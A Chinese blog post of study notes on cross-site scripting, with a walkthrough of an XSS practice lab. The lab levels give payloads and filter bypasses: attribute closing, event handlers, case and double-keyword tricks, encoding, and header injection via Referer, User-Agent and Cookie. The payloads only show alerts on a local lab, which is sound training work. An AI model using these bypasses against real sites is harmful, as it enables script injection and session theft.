首页 > 其他分享 >XSS

XSS

时间:2022-09-29 08:57:06浏览次数:39  
标签:XSS onclick text javascript alert ctsz1 type

XSS种类

1、反射型
提交的数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击
2、存储型
提交的数据成功的实现了XSS,存入了数据库/文件,别人访问这个页面的时候就会自动触发
3、dom型
利用dom树触发xss

 

见框就插

用户输入的数据被当做html语句放到了页面上去执行

<h1>666</h1> 存储

<script>alert('ctsz1')</script> 弹窗

<iframe src=http://baidu.com> 客户端攻击 ddos

 

cookie 凭证

 

onclick="alert('ctsz1') 点击

 

xss闯关

第一关 直接在name中加入<script>alert('ctsz1')</script>

第二关 在语句前面加上"><script>alert('ctsz1')</script> 绕过 闭合前面的语句

第三关 存储型

onfocus 事件在对象获得焦点时发生。

onfocus 通常用于 <input>, <select>, 和<a>.

插入'onfocus=javascript:alert('ctsz1') >语句然后点击输入框即可成功

第四关"onfocus=javascript:alert('ctsz1') > 和第四关一样 前面加双引号

第五关

此处无法通过<script>标签或触发事件来执行js代码的话,那么可以换一个标

签来执行js代码。

"><a href=javascript:alert('ctsz1') >

第六关 "ONocus=javascript:alert('ctsz1') >

"><a HRef=javascript:alert('ctsz1') > 改大小写绕过

第七关"oonnfocus=javascript:alert('ctsz1') >

"><a hrhrefef=javascrscriptipt:alert('ctsz1') > 双写关键字绕过

第八关 用编码工具将javascript:alert('ctsz1')进行编码

第九关javascript:alert('ctsz1')在后面加上一个//http:// 前面必须要加上注释符//

第十关 先输入<script>alert('ctsz1')</script>&t_link=" type="text"&t_history=" type="text"&t_sort=" type="text" 发现 t_sort标签可供利用

<script>alert('ctsz1')</script>&t_sort=" type="text" onclick="alert('ctsz1')

第十一关 先输入<script>alert('ctsz1')</script>&t_link=" type="text"&t_history=" type="text"&t_sort=" type="text" 发现 t_sort标签可供利用

然后抓包 加一个referer值 "type="text" onclick="alert('ctsz1') 就可以绕过

第十二关 抓包发现 t_ua这个标签,并且其中的value属性的值和数据包中User-Agent头的值一样

先闭合前面的value属性 "type="text" onclick="alert('ctsz1') 就可绕过

第十三关 抓包发现数据包中cookie头是有值的,而且这个值在响应的网页

源码中的t_cook标签中出现了。 "type="text" onclick="alert('ctsz1') 就可绕过

第十五关http://127.0.0.1/xsstest/level1.php?name=test

xss/level15.php?src='http://127.0.0.1/xsstest/level1.php?name=<img src=asd one rror=alert(1)>'

ng-include 文件包含可以包含之前的文件

第十六关 将参数值中的script替换成&nbsp;将参数值中的空格也替换成&nbsp;将参数值中的/符号替换成&nbsp;

<img

asrc=1

aonerror=alert(1)>

用%0A空格隔开<img%0asrc=1%0aonerror=alert(1)>

第十七关 改后端代码将 指向的swf文件改为index.png 然后onclick=alert() 点击图片绕过或者onmouseover=alert()鼠标移动绕过

标签:XSS,onclick,text,javascript,alert,ctsz1,type
From: https://www.cnblogs.com/Ctsz1/p/16740209.html

相关文章

  • 把beef-xss搭建在公网上
    我是la......
  • XSS(跨站脚本漏洞)——皮卡丘练习(小白随笔)
    环境准备:小皮(phpstudy)、皮卡丘(pikachu)、burpsuite、火狐浏览器概念理解:1、新建txt文档,后缀改为php<html> <body> :静态页面<?php>后端代码:在服务器先做计算,在再......
  • 针对CS最新XSS漏洞的详细研究--CVE-2022-39197
    针对CS最新XSS漏洞的详细研究--CVE-2022-39197本公众号技术文章仅供参考,未经允许,禁止转载!(某些逗比运营就别污染安全圈环境了)文章仅用于学习交流,请勿利用文章中的技术对......
  • 从0开始挖洞:XSS跨站脚本攻击
    一、XSS简介XSS(CrossSiteScripting跨站脚本攻击),指恶意攻击者通过向网站插入恶意payload或恶意脚本,从而盗取cookie、session信息以利用用户身份进行违规操作、盗取用户......
  • javascript 过滤字符串中script并且替换掉 xss注入攻击+js调试
    最近发现网上找答案也是80%类似结果。js调试可以在浏览器里,f10,f11可以比较准确。functionscriptReplace(str){if(newRegExp(".*?script[^>]*?.*?(<\/.*?sc......
  • 对表白墙wxss的解释
    一、index.wxss1/*信息*/2.Xinxi{3display:flex;4flex-wrap:wrap;5margin:0rpx1%;6}789/*信息列表*/10......
  • [第二章 web进阶]XSS闯关-1
    定义:跨站脚本(Cross_SiteScripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他......
  • CORS、XSS 概念
    CORS介绍跨域资源共享Cross-OriginResourceSharing,CORS需要浏览器和服务器同时支持。目前,所有浏览器都支持该功能,整个CORS通信过程,都是浏览器自动完成,不需要用户参......
  • 可别小看了XSS漏洞
    可别小看了XSS漏洞​ 对于初了解xss漏洞的人来说,XSS漏洞的危害就是获取受害者的cookie,来进行‘cookie劫持’。​ 今天就总结一下XSS漏洞的危害性,望安全人员不要轻视,开发......
  • XSS漏洞
    (备注:以下为个人学习笔记)一、什么是XSS答:XSS(crosssitescript)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之......